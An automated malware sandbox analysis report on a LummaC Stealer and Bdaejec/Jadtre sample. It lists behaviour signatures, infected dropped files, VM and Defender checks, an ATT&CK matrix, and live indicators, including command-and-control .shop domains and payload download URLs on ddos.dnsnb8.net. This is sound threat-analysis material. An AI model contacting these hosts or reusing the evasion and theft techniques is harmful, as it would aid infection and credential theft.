Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\Desktop\current[1].exe TID: 7568

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E91718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00E91754h

1_2_00E91718

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E929E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_00E929E2

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E92B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00E92B8C

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: current[1].exe, 00000000.00000003.2020575396.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707640338.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053204670.00000000008CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWm
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: current[1].exe, 00000000.00000003.2020575396.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707640338.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053177286.0000000000880000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053204670.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.000000000109F000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862651851.000000000109F000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862651851.000000000105E000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862651851.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.000000000107B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00461070 mov eax, dword ptr fs:[00000030h]	0_2_00461070
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00461260 mov eax, dword ptr fs:[00000030h]	0_2_00461260
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0046148C mov eax, dword ptr fs:[00000030h]	0_2_0046148C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004614B0 mov eax, dword ptr fs:[00000030h]	0_2_004614B0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004614B0 mov eax, dword ptr fs:[00000030h]	0_2_004614B0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045DD68 mov ecx, dword ptr fs:[00000030h]	0_2_0045DD68
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00460E50 mov eax, dword ptr fs:[00000030h]	0_2_00460E50
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A10B7 mov eax, dword ptr fs:[00000030h]	0_2_007A10B7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A14C7 mov eax, dword ptr fs:[00000030h]	0_2_007A14C7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0074092B mov eax, dword ptr fs:[00000030h]	0_2_0074092B
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00740D90 mov eax, dword ptr fs:[00000030h]	0_2_00740D90
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079DFCF mov ecx, dword ptr fs:[00000030h]	0_2_0079DFCF
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0082E933 push dword ptr fs:[00000030h]	0_2_0082E933

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: current[1].exe	String found in binary or memory: sofahuntingslidedine.shop
Source: current[1].exe	String found in binary or memory: culturesketchfinanciall.shop
Source: current[1].exe	String found in binary or memory: triangleseasonbenchwj.shop
Source: current[1].exe	String found in binary or memory: modestessayevenmilwek.shop
Source: current[1].exe	String found in binary or memory: liabilityarrangemenyit.shop
Source: current[1].exe	String found in binary or memory: claimconcessionrebe.shop
Source: current[1].exe	String found in binary or memory: secretionsuitcasenioise.shop
Source: current[1].exe	String found in binary or memory: gemcreedarticulateod.shop

Source: SciTE.exe.1.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E91718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,

1_2_00E91718

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E9139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

1_2_00E9139F

Source: C:\Users\user\Desktop\current[1].exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: jJEAWO.exe, 00000001.00000003.1683352875.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683579567.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
Source: Amcache.hve.1.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: jJEAWO.exe PID: 7452, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: current[1].exe PID: 7436, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: jJEAWO.exe PID: 7452, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: current[1].exe PID: 7436, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	2 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Process Injection	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	2 Process Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	4 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
current[1].exe	100%	Avira	W32/Jadtre.B
current[1].exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\jJEAWO.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\jJEAWO.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.scintilla.org/scite.rng	0%	URL Reputation	safe
http://www.rftp.comJosiah	0%	URL Reputation	safe
http://www.activestate.com	0%	URL Reputation	safe
http://www.activestate.comHolger	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://www.rftp.com	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	URL Reputation	malware
http://www.baanboard.comBrendon	0%	URL Reputation	safe
https://www.smartsharesystems.com/	0%	URL Reputation	safe
http://www.scintilla.org	0%	URL Reputation	safe
http://www.spaceblue.comMathias	0%	URL Reputation	safe
https://www.smartsharesystems.com/Morten	0%	URL Reputation	safe
http://www.develop.com	0%	URL Reputation	safe
http://www.lua.org	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	URL Reputation	malware
http://www.spaceblue.com	0%	URL Reputation	safe
http://www.baanboard.com	0%	URL Reputation	safe
http://www.develop.comDeepak	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManagerA	100%	Avira URL Cloud	phishing
triangleseasonbenchwj.shop	100%	Avira URL Cloud	phishing
sofahuntingslidedine.shop	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarh?	100%	Avira URL Cloud	malware
modestessayevenmilwek.shop	100%	Avira URL Cloud	malware
https://sofahuntingslidedine.shop/api	100%	Avira URL Cloud	phishing
secretionsuitcasenioise.shop	100%	Avira URL Cloud	phishing
https://sofahuntingslidedine.shop/	100%	Avira URL Cloud	phishing
https://sofahuntingslidedine.shop/u	100%	Avira URL Cloud	phishing
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
gemcreedarticulateod.shop	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarl	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarp	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rark	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarE0	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarm	100%	Avira URL Cloud	malware
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarT	100%	Avira URL Cloud	phishing
liabilityarrangemenyit.shop	0%	Avira URL Cloud	safe
https://www.cloudflare.com/learning/ddos/glossary/malware/	0%	Avira URL Cloud	safe
https://sofahuntingslidedine.shop/apik	100%	Avira URL Cloud	phishing
culturesketchfinanciall.shop	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarcC:	100%	Avira URL Cloud	malware
claimconcessionrebe.shop	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rarN	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false		unknown
sofahuntingslidedine.shop	188.114.96.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
sofahuntingslidedine.shop	true	Avira URL Cloud: phishing	unknown
triangleseasonbenchwj.shop	true	Avira URL Cloud: phishing	unknown
https://sofahuntingslidedine.shop/api	true	Avira URL Cloud: phishing	unknown
modestessayevenmilwek.shop	true	Avira URL Cloud: malware	unknown
secretionsuitcasenioise.shop	true	Avira URL Cloud: phishing	unknown
gemcreedarticulateod.shop	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown
liabilityarrangemenyit.shop	true	Avira URL Cloud: safe	unknown
culturesketchfinanciall.shop	true	Avira URL Cloud: phishing	unknown
claimconcessionrebe.shop	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManagerA	jJEAWO.exe, 00000001.00000002.1862651851.000000000109F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.rftp.comJosiah	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.activestate.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.activestate.comHolger	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarh?	jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	jJEAWO.exe, 00000001.00000003.1675913190.0000000000E80000.00000004.00001000.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862470986.0000000000E93000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
https://sofahuntingslidedine.shop/	current[1].exe, 00000000.00000002.2053363980.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://upx.sf.net	Amcache.hve.1.dr	false	URL Reputation: safe	unknown
http://www.rftp.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
https://sofahuntingslidedine.shop/u	current[1].exe, 00000000.00000003.2020471181.000000000089A000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707811358.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053204670.000000000089A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarp	jJEAWO.exe, 00000001.00000002.1863177242.0000000002DBA000.00000004.00000010.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.baanboard.comBrendon	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rark	jJEAWO.exe, 00000001.00000002.1862651851.000000000105E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://www.smartsharesystems.com/	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarl	jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
